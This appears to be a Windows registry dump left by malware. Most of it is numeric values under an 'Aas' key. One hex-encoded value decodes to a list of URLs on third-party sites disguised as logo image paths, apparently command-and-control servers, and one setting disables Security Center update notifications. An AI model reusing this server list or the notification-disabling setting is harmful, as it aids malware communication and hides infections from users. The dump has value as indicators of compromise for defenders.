"a4_203" = "1455331563"
"a4_202" = "1448162442"
"a4_205" = "1469669805"
"a4_204" = "1462500684"
"a4_207" = "1484008047"
"a4_206" = "1476838926"
"a4_209" = "1498346289"
"a4_208" = "1491177168"
"a4_823" = "1605219287"
"a4_449" = "3218935329"
"a4_448" = "3211766208"
"a4_119" = "853125399"
"a4_118" = "845956278"
"a4_115" = "824448915"
"a4_114" = "817279794"
"a4_117" = "838787157"
"a4_116" = "831618036"
"a4_111" = "795772431"
"a4_110" = "788603310"
"a4_113" = "810110673"
"a4_112" = "802941552"
"a4_924" = "2329300508"
"a4_565" = "4050553365"
"a3_750" = "1098874375"
"a3_751" = "1105859238"
"a3_752" = "1079359193"
"a3_753" = "1086794616"
"a4_566" = "4057722486"
"a3_921" = "2290961104"
"a3_754" = "1127403419"
"a4_879" = "2006690063"
"a3_725" = "885927068"
"a3_755" = "1134321722"
"a3_756" = "1108280413"
"a4_991" = "2809631615"
"a1_783" = "754863391"
"a3_757" = "1115339004"
"a1_959" = "1513892358"
"a2_907" = "2207432236"
"a4_990" = "2802462494"
"a1_161" = "2566369818"
"a1_160" = "2918614898"
"a1_163" = "1035816470"
"a1_162" = "3582304315"
"a1_165" = "578488711"
"a1_164" = "856161141"
"a1_167" = "2129413137"
"a1_166" = "3632263130"
"a1_169" = "982594139"
"a1_168" = "579896539"
"a4_992" = "2816800736"
"a4_994" = "2831138978"
"a3_727" = "933979486"
"a2_535" = "3835482352"
"a2_534" = "3828316364"
"a2_537" = "3849821014"
"a2_536" = "3842651464"
"a2_531" = "3806801605"
"a2_530" = "3799633671"
"a2_533" = "3821134470"
"a2_532" = "3813969831"
"a2_829" = "1648237050"
"a2_828" = "1641067747"
"a2_539" = "3864151224"
"a2_538" = "3856980043"
"a4_447" = "3204597087"
"a1_572" = "3823266062"
"a1_573" = "2926107712"
"a1_570" = "1248302988"
"a1_571" = "2199939966"
"a1_576" = "4036398643"
"a1_577" = "3504567038"
"a1_574" = "2045093664"
"a1_575" = "2012557079"
"a1_578" = "2264629770"
"a1_579" = "1696886488"
"a2_649" = "357785734"
"a2_648" = "350631513"
"a2_319" = "2286947570"
"a2_318" = "2279779180"
"a2_315" = "2258277786"
"a2_314" = "2251097546"
"a2_317" = "2272612941"
"a2_316" = "2265433531"
"a2_311" = "2229593072"
"a2_310" = "2222430912"
"a2_313" = "2243928067"
"a2_312" = "2236763928"
"a2_229" = "1641733607"
"a2_228" = "1634563071"
"a2_221" = "1584366986"
"a2_220" = "1577211543"
"a2_223" = "1598713256"
"a2_222" = "1591548686"
"a2_225" = "1613046381"
"a2_224" = "1605881210"
"a2_227" = "1627405092"
"a2_226" = "1620216914"
"a1_370" = "472838894"
"a1_371" = "4127540706"
"a1_372" = "3157408842"
"a1_373" = "3748408332"
"a1_374" = "3970393293"
"a1_375" = "1183814876"
"a1_376" = "4283962966"
"a1_377" = "4137625991"
"a1_378" = "608036100"
"a1_379" = "3844599238"
"a2_793" = "1390143340"
"a2_792" = "1382979197"
"a2_795" = "1404480563"
"a2_794" = "1397311757"
"a2_797" = "1418827994"
"a2_796" = "1411647487"
"a3_36" = "241268621"
"a3_37" = "248309804"
"a3_183" = "1328655230"
"a1_29" = "2874575059"
"a1_28" = "2083241258"
"a1_590" = "939983062"
"a1_23" = "898850058"
"a1_22" = "2336035740"
"a1_21" = "1255986976"
"a1_20" = "3623328094"
"a1_27" = "2581913483"
"a1_26" = "2000833430"
"a1_25" = "103278791"
"a1_24" = "2566690726"
"a1_284" = "3558793673"
"a1_285" = "1897324867"
"a1_286" = "3198142946"
"a1_287" = "3650977142"
"a1_280" = "1559333973"
"a1_282" = "1067750320"
"a1_283" = "1995452009"
"a3_31" = "205278614"
"a1_288" = "837850445"
"a1_289" = "2913560375"
"a3_778" = "1299211491"
"a3_779" = "1306728706"
"a2_903" = "2178748364"
"a1_591" = "446297266"
"a3_32" = "212854281"
"a2_972" = "2673468530"
"a3_558" = "4017332551"
"a3_559" = "4024255974"
"a3_556" = "3969214597"
"a3_557" = "4009757988"
"a1_552" = "2225731953"
"a3_555" = "3962303586"
"a3_552" = "3940752129"
"a3_553" = "3981361056"
"a3_550" = "3926311503"
"a3_551" = "3933234926"
"a1_598" = "3141828237"
"a1_599" = "3720239403"
"a3_178" = "1292673371"
"a3_179" = "1300121082"
"a3_174" = "1264145351"
"a3_175" = "1271198822"
"a3_176" = "1245079705"
"a3_177" = "1252068664"
"a3_170" = "1235731011"
"a3_171" = "1209100002"
"a3_172" = "1216092933"
"a3_173" = "1223671716"
"a2_31" = "222247675"
"a2_30" = "215079494"
"a2_33" = "236580561"
"a2_32" = "229414721"
"a2_35" = "250911292"
"a2_34" = "243747173"
"a2_37" = "265265620"
"a2_36" = "258082692"
"a2_39" = "279598553"
"a2_38" = "272417708"
"a3_486" = "3467639311"
"a3_487" = "3508182702"
"a3_480" = "3424608201"
"a3_481" = "3431657576"
"a3_482" = "3438646411"
"a3_483" = "3479636266"
"a4_902" = "2171579846"
"a2_584" = "4186759960"
"a4_79" = "566360559"
"a4_78" = "559191438"
"a4_906" = "2200256330"
"a4_907" = "2207425451"
"a4_904" = "2185918088"
"a2_585" = "4193943545"
"a4_73" = "523345833"
"a4_72" = "516176712"
"a4_71" = "509007591"
"a4_70" = "501838470"
"a4_77" = "552022317"
"a4_76" = "544853196"
"a4_75" = "537684075"
"a4_74" = "530514954"
"a3_642" = "324456811"
"a3_390" = "2812641775"
"a3_391" = "2786540046"
"a3_392" = "2793594529"
"a3_393" = "2800513728"
"a3_394" = "2841581411"
"a3_395" = "2848623490"
"a3_396" = "2821991461"
"a3_397" = "2829566020"
"a3_398" = "2870043879"
"a3_399" = "2877036806"
"a1_529" = "3822961966"
"a1_625" = "2525948271"
"a1_622" = "3482106339"
"a1_623" = "6932913"
"a1_620" = "3964258088"
"a1_621" = "1133322743"
"a3_643" = "331380106"
[HKCU\Software\Aas\695404737]
"7169121" = "218"
[HKCU\Software\Aas]
"a3_958" = "2556348631"
"a3_959" = "2563272054"
"a1_528" = "2828609295"
"a2_588" = "4215444611"
"a3_950" = "2498827743"
"a3_951" = "2539425406"
"a3_956" = "2575413269"
"a3_957" = "2582860980"
"a3_954" = "2527820627"
"a2_589" = "4222610939"
"a1_976" = "1943079813"
"a1_977" = "3030526784"
"a1_974" = "2737619581"
"a1_975" = "2668595226"
"a1_972" = "4063749254"
"a1_973" = "158758358"
"a1_970" = "2506510388"
"a3_827" = "1616916338"
"a1_770" = "1009082003"
"a1_978" = "117585359"
"a1_979" = "209779370"
"a4_199" = "1426655079"
"a3_505" = "3603458416"
"a3_504" = "3596547281"
"a2_363" = "2602388443"
"a3_507" = "3651577394"
"a3_506" = "3644525971"
"a3_501" = "3608550396"
"a3_500" = "3568002909"
"a3_503" = "3623047358"
"a3_502" = "3615603743"
"a4_821" = "1590881045"
"a4_698" = "709079162"
"a4_699" = "716248283"
"a4_820" = "1583711924"
"a4_692" = "666064436"
"a4_693" = "673233557"
"a4_690" = "651726194"
"a4_691" = "658895315"
"a4_696" = "694740920"
"a4_697" = "701910041"
"a4_694" = "680402678"
"a4_695" = "687571799"
"a4_822" = "1598050166"
"a3_828" = "1624490901"
"a3_829" = "1664967732"
"a3_826" = "1643547347"
"a4_825" = "1619557529"
"a3_824" = "1628992017"
"a3_825" = "1636505264"
"a3_822" = "1581458783"
"a3_823" = "1588517374"
"a3_820" = "1600580765"
"a3_821" = "1607565628"
"a2_900" = "2157247539"
"a1_746" = "3442346995"
"a4_827" = "1633895771"
"a2_901" = "2164412660"
"a3_644" = "305393197"
"a4_826" = "1626726650"
"a2_902" = "2171580969"
"a4_274" = "1964339154"
"a4_275" = "1971508275"
"a4_276" = "1978677396"
"a4_277" = "1985846517"
"a4_270" = "1935662670"
"a4_271" = "1942831791"
"a4_272" = "1950000912"
"a4_273" = "1957170033"
"a2_904" = "2185912535"
"a4_278" = "1993015638"
"a4_279" = "2000184759"
"a2_905" = "2193080399"
"a2_906" = "2200248989"
"a4_478" = "3426839838"
"a4_479" = "3434008959"
"a4_476" = "3412501596"
"a4_477" = "3419670717"
"a4_474" = "3398163354"
"a4_475" = "3405332475"
"a4_472" = "3383825112"
"a4_473" = "3390994233"
"a4_470" = "3369486870"
"a4_471" = "3376655991"
"a4_308" = "2208089268"
"a4_309" = "2215258389"
"a4_300" = "2150736300"
"a4_301" = "2157905421"
"a4_302" = "2165074542"
"a4_303" = "2172243663"
"a4_304" = "2179412784"
"a4_305" = "2186581905"
"a4_306" = "2193751026"
"a4_307" = "2200920147"
"a1_114" = "411323433"
"a1_115" = "1798063396"
"a1_116" = "445925705"
"a1_117" = "1261207579"
"a1_110" = "562005972"
"a1_111" = "3278430025"
"a1_112" = "3173036730"
"a1_113" = "4162935684"
"a1_824" = "2353155555"
"a1_118" = "2608938211"
"a1_119" = "429151588"
"a4_576" = "4129413696"
"a4_920" = "2300624024"
"a3_732" = "969437045"
"a2_498" = "3570226065"
"a2_499" = "3577393289"
"a2_492" = "3527212503"
"a2_493" = "3534378608"
"a2_490" = "3512895525"
"a2_491" = "3520044055"
"a2_496" = "3555875511"
"a2_497" = "3563046444"
"a2_494" = "3541544697"
"a2_495" = "3548722268"
"a2_816" = "1555030743"
"a2_817" = "1562213910"
"a2_814" = "1540701056"
"a2_815" = "1547863963"
"a2_812" = "1526364355"
"a3_740" = "1026900557"
"a2_810" = "1512029879"
"a2_811" = "1519183569"
"a3_733" = "943391636"
"a4_570" = "4086398970"
"a2_818" = "1569365678"
"a2_819" = "1576546672"
"a1_565" = "2928101998"
"a1_564" = "486907233"
"a1_567" = "1184952683"
"a1_566" = "1661342408"
"a1_561" = "3411605134"
"a1_560" = "985373065"
"a1_563" = "867306729"
"a1_562" = "1870731983"
"a1_569" = "3786132020"
"a1_568" = "4120695415"
"a1_525" = "3532887528"
"a2_678" = "565692086"
"a2_679" = "572860088"
"a2_676" = "551366771"
"a2_677" = "558520069"
"a2_674" = "537027926"
"a2_675" = "544191120"
"a2_672" = "522676252"
"a2_673" = "529857804"
"a2_670" = "508341909"
"a2_671" = "515506922"
"a3_982" = "2728158783"
"a2_258" = "1849625409"
"a2_259" = "1856803428"
"a2_254" = "1820951253"
"a2_255" = "1828116563"
"a2_256" = "1835300975"
"a2_257" = "1842469783"
"a2_250" = "1792285651"
"a2_251" = "1799454290"
"a2_252" = "1806625873"
"a2_253" = "1813778921"
"a1_363" = "987055920"
"a1_362" = "487622494"
"a1_361" = "2535883478"
"a1_360" = "154270625"
"a1_367" = "564120642"
"a1_366" = "1634264304"
"a1_365" = "4190038558"
"a1_364" = "415194928"
"a1_369" = "1902923840"
"a1_368" = "460828076"
"a3_977" = "2692709400"
"a3_924" = "2346001461"
"a1_38" = "189863093"
"a1_39" = "3550613625"
"a1_30" = "4282815863"
"a1_31" = "430293803"
"a1_32" = "1708107647"
"a1_33" = "2929434835"
"a1_34" = "307448102"
"a1_35" = "3446818814"
"a1_36" = "449428711"
"a1_37" = "2596242110"
"a1_297" = "2191886428"
"a1_296" = "3337219732"
"a1_295" = "2031549599"
"a1_294" = "1498966958"
"a1_293" = "4201422777"
"a1_292" = "296904557"
"a1_291" = "4139746545"
"a1_290" = "4021317343"
"a1_299" = "3128848786"
"a1_298" = "1177532838"
"a3_769" = "1234824520"
"a1_600" = "2272385769"
"a2_668" = "494006389"
"a1_601" = "2047718403"
"a3_761" = "1143737968"
"a3_760" = "1170380241"
"a3_763" = "1191790386"
"a4_286" = "2050368606"
"a3_765" = "1206362100"
"a1_602" = "1891000398"
"a3_767" = "1186780342"
"a3_766" = "1179725847"
"a2_108" = "774260303"
"a2_109" = "781425859"
"a4_878" = "1999520942"
"a1_603" = "118449278"
"a2_100" = "716904137"
"a2_101" = "724075144"
"a2_102" = "731243161"
"a2_103" = "738424376"
"a2_104" = "745593493"
"a2_105" = "752761902"
"a2_106" = "759926589"
"a2_107" = "767090960"
"a3_541" = "3861793492"
"a3_540" = "3887912629"
"a3_543" = "3909387158"
"a3_542" = "3868847991"
"a3_545" = "3923892392"
"a3_544" = "3916833801"
"a3_547" = "3904770410"
"a3_546" = "3897785547"
"a3_549" = "3952815660"
"a3_548" = "3945379213"
"a1_607" = "1690365608"
"a1_589" = "129090833"
"a1_588" = "772432731"
"a3_169" = "1228156448"
"a3_168" = "1187689857"
"a3_167" = "1180635502"
"a3_166" = "1206680783"
"a3_165" = "1199757484"
"a3_164" = "1192698893"
"a3_163" = "1151697898"
"a3_162" = "1144713035"
"a3_161" = "1171213096"
"a3_160" = "1163777673"
"a1_749" = "3949280148"
"a1_748" = "1140331521"
"a2_28" = "200727499"
"a2_29" = "207896816"
"a2_26" = "186395626"
"a2_27" = "193560584"
"a2_24" = "172061124"
"a2_25" = "179230852"
"a2_22" = "157713193"
"a2_23" = "164895463"
"a2_20" = "143379152"
"a2_21" = "150546176"
"a4_68" = "487500228"
"a4_69" = "494669349"
"a4_917" = "2279116661"
"a4_916" = "2271947540"
"a4_911" = "2236101935"
"a4_910" = "2228932814"
"a4_913" = "2250440177"
"a4_912" = "2243271056"
"a4_60" = "430147260"
"a4_61" = "437316381"
"a4_62" = "444485502"
"a4_63" = "451654623"
"a4_64" = "458823744"
"a4_65" = "465992865"
"a4_66" = "473161986"
"a4_67" = "480331107"
"a4_833" = "1676910497"
"a4_959" = "2580219743"
"a2_758" = "1139220553"
"a2_7" = "50175488"
"a2_6" = "43009672"
"a2_5" = "35842745"
"a2_4" = "28675893"
"a2_3" = "21510676"
"a2_2" = "14340133"
"a2_1" = "7172457"
"a2_0" = "9039"
"a1_639" = "2062313174"
"a1_638" = "3599260906"
"a3_389" = "2805656908"
"a3_388" = "2765048109"
"a2_9" = "64528010"
"a2_8" = "57359094"
"a4_5" = "35845605"
"a4_4" = "28676484"
"a4_7" = "50183847"
"a4_6" = "43014726"
"a4_1" = "7169121"
"a4_0" = "0"
"a4_3" = "21507363"
"a4_2" = "14338242"
"a4_9" = "64522089"
"a4_8" = "57352968"
"a2_756" = "1124890275"
"a3_949" = "2491838908"
"a3_948" = "2484395293"
"a3_945" = "2462900280"
"a3_944" = "2455850905"
"a3_947" = "2510895354"
"a3_946" = "2503967835"
"a3_941" = "2467992228"
"a3_940" = "2427452933"
"a3_943" = "2482482022"
"a3_942" = "2474915527"
"a3_875" = "1961196962"
"a1_532" = "11409329"
"a1_533" = "3995154251"
"a4_845" = "1762939949"
"a2_853" = "1820284624"
"a3_708" = "797636205"
"a4_923" = "2322131387"
"a3_970" = "2675785123"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 8B CF 82 61 5C 66 6D AB D0 2F EA 78 DA 6A 10"
[HKCU\Software\Aas]
"a1_968" = "3110860190"
"a4_689" = "644557073"
"a4_688" = "637387952"
"a1_951" = "1042045673"
"a4_685" = "615880589"
"a4_684" = "608711468"
"a4_687" = "630218831"
"a4_686" = "623049710"
"a4_681" = "587204105"
"a4_680" = "580034984"
"a4_683" = "601542347"
"a4_682" = "594373226"
"a3_831" = "1645985014"
"a3_830" = "1671960663"
"a3_833" = "1659958664"
"a3_832" = "1652904297"
"a3_835" = "1707934282"
"a1_538" = "2894422628"
"a3_837" = "1688886028"
"a3_836" = "1681434349"
"a3_839" = "1736479694"
"a3_838" = "1729494959"
"a1_539" = "3598831970"
"a1_957" = "4062433674"
"a4_267" = "1914155307"
"a4_266" = "1906986186"
"a4_265" = "1899817065"
"a4_264" = "1892647944"
"a4_263" = "1885478823"
"a4_262" = "1878309702"
"a4_261" = "1871140581"
"a4_260" = "1863971460"
[HKCU\Software\Aas\695404737]
"43014726" = "0A00687474703A2F2F63616465732E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F636576697A74762E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F746861692D736B796C696768742E636F6D2F627574746F6E2E67696600687474703A2F2F636F726573646162616869612E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F736D6F6B696E2D74722E636F6D2F6173736574732F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E62756572676572666573742D6772616566656E626572672E64652F6C6F676F2E67696600687474703A2F2F77696E676D616B657273686F70652E7A612E706C2F696D616765732F627574746F6E2E67696600687474703A2F2F77656C6C73736D616C6C2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E75656873692E64652F6C6F676F2E67696600687474703A2F2F686F74656C697370622E686F702E72752F696D6167652F6C6F676F2E676966"
[HKCU\Software\Aas]
"a4_269" = "1928493549"
"a4_268" = "1921324428"
"a4_461" = "3304964781"
"a4_460" = "3297795660"
"a4_463" = "3319303023"
"a4_462" = "3312133902"
"a4_465" = "3333641265"
"a4_464" = "3326472144"
"a4_467" = "3347979507"
"a4_466" = "3340810386"
"a4_469" = "3362317749"
"a4_468" = "3355148628"
"a4_897" = "2135734241"
"a4_898" = "2142903362"
"a4_899" = "2150072483"
"a2_560" = "4014704660"
"a4_319" = "2286949599"
"a4_318" = "2279780478"
"a1_840" = "1984399133"
"a4_313" = "2243934873"
"a4_312" = "2236765752"
"a4_311" = "2229596631"
"a4_310" = "2222427510"
"a4_317" = "2272611357"
"a4_316" = "2265442236"
"a4_315" = "2258273115"
"a4_314" = "2251103994"
"a3_130" = "915379051"
"a1_923" = "2102776783"
"a3_131" = "922302346"
"a3_132" = "962897965"
"a2_880" = "2013861914"
"a1_107" = "3061453263"
"a1_106" = "2032978449"
"a1_105" = "3176580031"
"a1_104" = "1990028962"
"a1_103" = "2802336350"
"a1_102" = "1632706426"
"a1_101" = "2286375041"
"a1_100" = "2488396436"
"a3_134" = "943841519"
"a1_109" = "3860163356"
"a1_62" = "460365777"
"a1_61" = "320428109"
"a3_137" = "998890944"
"a2_883" = "2035360616"
"a3_686" = "606179783"
"a2_489" = "3505692798"
"a2_488" = "3498539973"
"a3_687" = "613616230"
"a2_485" = "3477028258"
"a2_484" = "3469859676"
"a2_487" = "3491357050"
"a2_486" = "3484191164"
"a2_481" = "3448342247"
"a2_480" = "3441169409"
"a2_483" = "3462692110"
"a2_482" = "3455507855"
"a3_974" = "2704311079"
"a3_685" = "632749476"
"a3_975" = "2711758662"
"a2_882" = "2028194617"
"a3_976" = "2685262841"
"a2_809" = "1504847898"
"a2_808" = "1497681866"
"a4_721" = "873968945"
"a3_680" = "596757377"
"a2_801" = "1447495918"
"a2_800" = "1440330654"
"a2_803" = "1461832574"
"a3_681" = "570649632"
"a2_805" = "1476181546"
"a2_804" = "1469012351"
"a2_807" = "1490514079"
"a2_806" = "1483348544"
"a3_145" = "1022800088"
"a3_972" = "2656717413"
"a3_144" = "1015749817"
"a2_885" = "2049711365"
"a3_973" = "2663771780"
"a3_147" = "1070844314"
"a2_661" = "443825134"
"a2_660" = "436660783"
"a2_663" = "458156937"
"a3_146" = "1063277947"
"a2_665" = "472492520"
"a2_664" = "465322195"
"a2_667" = "486840295"
"a2_666" = "479674027"
"a2_669" = "501173593"
"a3_141" = "1027810116"
"a3_140" = "986812197"
"a2_881" = "2021026294"
"a3_143" = "1008236550"
"a2_249" = "1785129456"
"a2_248" = "1777937175"
"a2_247" = "1770781254"
"a2_246" = "1763595533"
"a2_245" = "1756432018"
"a2_244" = "1749257971"
"a2_243" = "1742100367"
"a2_242" = "1734933986"
"a2_241" = "1727750790"
"a2_240" = "1720584026"
"a1_356" = "522743864"
"a1_357" = "3698075788"
"a1_354" = "303454233"
"a1_355" = "1707461298"
"a1_352" = "3527033019"
"a1_353" = "2484309462"
"a1_350" = "1020180167"
"a1_351" = "606926258"
"a2_855" = "1834624644"
"a3_639" = "269411382"
"a1_358" = "1924247729"
"a1_359" = "4149522257"
"a3_638" = "295912343"
"a2_887" = "2064044676"
"a2_886" = "2056864919"
"a3_795" = "1387647762"
"a3_718" = "869065255"
"a3_719" = "843023942"
"a3_714" = "807050403"
"a3_715" = "813969602"
"a3_716" = "821548389"
"a3_717" = "862013828"
"a3_710" = "778506031"
"a3_711" = "785556302"
"a3_712" = "826034145"
"a3_713" = "833615872"
"a2_820" = "1583714595"
"a2_119" = "853128804"
"a2_118" = "845961958"
"a4_869" = "1934998853"
"a4_868" = "1927829732"
"a2_113" = "810113245"
"a2_112" = "802932741"
"a2_111" = "795777957"
"a2_110" = "788610124"
"a2_117" = "838792476"
"a2_116" = "831608963"
"a2_115" = "824443222"
"a2_114" = "817276370"
"a3_534" = "3844868223"
"a3_535" = "3852446878"
"a3_536" = "3825811761"
"a3_537" = "3832866128"
"a3_530" = "3816471291"
"a3_531" = "3823394586"
"a3_532" = "3797414845"
"a1_403" = "3757031581"
"a3_538" = "3840383475"
"a3_539" = "3880858130"
"a2_813" = "1533537056"
"a3_152" = "1106310065"
"a3_153" = "1080268752"
"a3_150" = "1092336383"
"a3_151" = "1099259678"
"a3_156" = "1135231285"
"a3_157" = "1108731220"
"a3_154" = "1087178867"
"a3_155" = "1127787666"
"a3_628" = "223959005"
"a3_629" = "231000188"
"a3_158" = "1115724279"
"a3_159" = "1123168790"
"a2_59" = "422983093"
"a2_58" = "415801449"
"a2_53" = "379971678"
"a2_52" = "372800663"
"a2_51" = "365617913"
"a2_50" = "358463685"
"a2_57" = "408634297"
"a2_56" = "401468068"
"a2_55" = "394299658"
"a2_54" = "387135135"
"a4_842" = "1741432586"
"a4_55" = "394301655"
"a4_54" = "387132534"
"a4_57" = "408639897"
"a4_56" = "401470776"
"a4_51" = "365625171"
"a4_50" = "358456050"
"a4_53" = "379963413"
"a4_52" = "372794292"
"a3_440" = "3171413137"
"a3_441" = "3178398000"
"a3_442" = "3185321299"
"a3_443" = "3159349746"
"a4_59" = "422978139"
"a4_58" = "415809018"
"a3_446" = "3214379735"
"a3_447" = "3187748726"
"a1_644" = "3090955613"
"a1_645" = "3093029922"
"a1_646" = "3925084020"
"a1_647" = "2280808859"
"a1_640" = "1805584969"
"a1_641" = "1341072309"
"a1_642" = "1357193244"
"a1_643" = "259929296"
"a1_648" = "4261343284"
"a1_649" = "3124230902"
[HKCU\Software\Aas\695404737]
"21507363" = "0"
[HKCU\Software\Aas]
"a2_953" = "2537207766"
"a3_459" = "3307312066"
"a3_458" = "3266772899"
"a4_784" = "1325623568"
"a4_785" = "1332792689"
"a4_786" = "1339961810"
"a4_787" = "1347130931"
"a4_780" = "1296947084"
"a4_781" = "1304116205"
"a4_782" = "1311285326"
"a4_783" = "1318454447"
"a1_828" = "2920560398"
"a1_829" = "1546142883"
"a4_788" = "1354300052"
"a3_451" = "3249847498"
"a4_670" = "508343774"
"a4_671" = "515512895"
"a4_672" = "522682016"
"a3_450" = "3242793131"
"a4_674" = "537020258"
"a4_675" = "544189379"
"a4_676" = "551358500"
"a4_677" = "558527621"
"a4_678" = "565696742"
"a1_604" = "3981759629"
"a1_916" = "3845104223"
"a1_917" = "4250723787"
"a1_910" = "2452170860"
"a1_911" = "531952798"
"a1_912" = "2880988204"
"a1_913" = "1691396394"
"a3_844" = "1772455397"
"a3_845" = "1746353668"
"a3_846" = "1753404071"
"a3_847" = "1760327366"
"a3_840" = "1743926369"
"a3_841" = "1717414016"
"a3_842" = "1724861731"
"a3_843" = "1765466434"
"a3_848" = "1801448313"
"a3_849" = "1808437144"
"a3_702" = "721038295"
"a4_874" = "1970844458"
"a1_654" = "17632213"
"a4_961" = "2594557985"
"a4_414" = "2968016094"
"a4_415" = "2975185215"
"a4_416" = "2982354336"
"a4_417" = "2989523457"
"a4_410" = "2939339610"
"a4_411" = "2946508731"
"a4_412" = "2953677852"
"a4_413" = "2960846973"
"a4_418" = "2996692578"
"a4_419" = "3003861699"
"a3_806" = "1500078927"
"a3_807" = "1507067886"
"a1_138" = "1482427011"
"a1_139" = "3244776047"
"a3_907" = "2190592386"
"a1_132" = "2350124381"
"a1_133" = "1896767070"
"a1_130" = "2553053064"
"a1_131" = "3742579454"
"a1_136" = "375208661"
"a1_137" = "322056140"
"a1_134" = "3546464368"
"a1_135" = "1251533170"
"a3_768" = "1227770153"
"a4_328" = "2351471688"
"a4_329" = "2358640809"
"a4_326" = "2337133446"
"a4_327" = "2344302567"
"a4_324" = "2322795204"
"a4_325" = "2329964325"
"a4_322" = "2308456962"
"a4_323" = "2315626083"
"a4_320" = "2294118720"
"a4_321" = "2301287841"
"a4_528" = "3785295888"
"a4_529" = "3792465009"
"a4_258" = "1849633218"
"a4_259" = "1856802339"
"a4_252" = "1806618492"
"a4_253" = "1813787613"
"a4_250" = "1792280250"
"a4_251" = "1799449371"
"a4_256" = "1835294976"
"a4_257" = "1842464097"
"a4_254" = "1820956734"
"a4_255" = "1828125855"
"a3_909" = "2238580292"
"a2_470" = "3369488761"
"a2_471" = "3376657996"
"a2_472" = "3383833219"
"a2_473" = "3390991158"
"a2_474" = "3398159404"
"a2_475" = "3405323404"
"a2_476" = "3412507315"
"a2_477" = "3419712060"
"a2_478" = "3426864393"
"a2_479" = "3434008304"
"a4_880" = "2013859184"
"a3_908" = "2231591461"
"a1_797" = "1237177382"
"a2_878" = "1999527143"
"a2_879" = "2006681752"
"a2_874" = "1970840621"
"a2_875" = "1978009880"
"a2_876" = "1985177057"
"a2_877" = "1992359662"
"a2_870" = "1942173789"
"a2_871" = "1949345491"
"a2_872" = "1956464617"
"a2_873" = "1963683310"
"a1_349" = "4147842036"
"a1_348" = "3121588449"
"a2_586" = "4201112512"
"a2_587" = "4208276670"
"a2_580" = "4158092509"
"a2_581" = "4165257994"
"a2_582" = "4172425613"
"a2_583" = "4179606829"
"a1_341" = "549346406"
"a1_340" = "427734536"
"a1_343" = "396794667"
"a1_342" = "370409290"
"a1_345" = "3010585812"
"a1_344" = "1742085644"
"a1_347" = "3645687770"
"a1_346" = "2992413863"
"a2_614" = "106880024"
"a2_615" = "114047908"
"a2_616" = "121214653"
"a2_617" = "128382650"
"a2_610" = "78198997"
"a2_611" = "85363668"
"a2_612" = "92524676"
"a2_613" = "99697063"
"a2_618" = "135557671"
"a2_619" = "142710468"
"a2_272" = "1950003834"
"a2_273" = "1957171979"
"a2_270" = "1935656444"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a2_276" = "1978674905"
"a2_277" = "1985839282"
"a2_274" = "1964340677"
"a2_275" = "1971515897"
"a2_908" = "2214603122"
"a2_909" = "2221767442"
"a2_278" = "1993021585"
"a2_279" = "2000176164"
"a1_842" = "819285852"
"a2_298" = "2136407328"
"a2_299" = "2143560047"
"a1_841" = "2527890420"
"a2_290" = "2079042917"
"a2_291" = "2086209277"
"a2_292" = "2093374851"
"a2_293" = "2100559315"
"a2_294" = "2107727825"
"a2_295" = "2114892512"
"a2_296" = "2122057493"
"a2_297" = "2129224620"
"a2_728" = "924150131"
"a2_729" = "931316684"
"a2_720" = "866796551"
"a2_721" = "873964326"
"a2_722" = "881132833"
"a2_723" = "888300245"
"a2_724" = "895483247"
"a2_725" = "902649098"
"a2_726" = "909805627"
"a2_727" = "916985610"
"a1_594" = "733341403"
"a4_450" = "3226104450"
"a3_791" = "1392659870"
"a3_709" = "804547212"
"a4_451" = "3233273571"
"a3_707" = "790584778"
"a3_706" = "749582763"
"a3_705" = "742524168"
"a3_704" = "769089769"
"a3_703" = "761646198"
"a4_452" = "3240442692"
"a3_701" = "713602996"
"a3_700" = "706548501"
"a4_890" = "2085550394"
"a4_891" = "2092719515"
"a4_892" = "2099888636"
"a4_453" = "3247611813"
"a4_894" = "2114226878"
"a4_895" = "2121395999"
"a2_128" = "917645925"
"a2_129" = "924815309"
"a2_126" = "903300717"
"a2_127" = "910487455"
"a2_124" = "888963927"
"a2_125" = "896145322"
"a2_122" = "874631143"
"a2_123" = "881796027"
"a2_120" = "860296235"
"a2_121" = "867461381"
"a3_35" = "267899754"
"a3_526" = "3787937127"
"a3_525" = "3780489412"
"a3_524" = "3739884709"
"a3_523" = "3732895746"
"a4_456" = "3269119176"
"a3_521" = "3751945024"
"a3_520" = "3744501537"
"a2_824" = "1612383063"
"a4_457" = "3276288297"
"a3_529" = "3809412696"
"a3_528" = "3768345145"
"a1_12" = "3591296450"
"a1_13" = "3684116147"
"a1_10" = "3939837768"
"a1_11" = "3927362017"
"a1_16" = "3516392527"
"a1_17" = "3784217508"
"a1_14" = "2443395972"
"a1_15" = "2631994645"
"a1_18" = "1696823912"
"a1_19" = "4093072486"
"a3_149" = "1051199068"
"a3_148" = "1044210237"
"a2_896" = "2128574026"
"a2_48" = "344126211"
"a2_49" = "351285117"
"a1_846" = "237312209"
"a2_40" = "286767844"
"a2_41" = "293942062"
"a2_42" = "301100775"
"a2_43" = "308265510"
"a2_44" = "315450726"
"a2_45" = "322602716"
"a2_46" = "329782113"
"a2_47" = "336951144"
"a2_897" = "2135728134"
"a4_42" = "301103082"
"a4_43" = "308272203"
"a4_40" = "286764840"
"a4_41" = "293933961"
"a4_46" = "329779566"
"a4_47" = "336948687"
"a4_44" = "315441324"
"a4_45" = "322610445"
"a3_453" = "3230791052"
"a3_452" = "3223736685"
"a4_48" = "344117808"
"a4_49" = "351286929"
"a3_457" = "3259718400"
"a3_456" = "3285821153"
"a3_455" = "3278766670"
"a3_454" = "3271781935"
"a1_657" = "1986516815"
"a1_656" = "2483634941"
"a1_655" = "673775222"
"a1_632" = "1417659261"
"a1_653" = "1740411310"
"a1_652" = "4189869687"
"a1_651" = "3568257454"
"a1_650" = "377868318"
"a3_796" = "1428649909"
"a1_659" = "2228559100"
"a1_658" = "637116160"
"a3_797" = "1435691988"
"a3_18" = "112354555"
"a3_19" = "152901914"
"a3_14" = "83367783"
"a3_15" = "124488582"
"a3_16" = "131411001"
"a3_17" = "104906840"
"a3_10" = "88506851"
"a3_11" = "95435266"
"a3_12" = "69459621"
"a3_13" = "76378820"
"a3_240" = "1737322713"
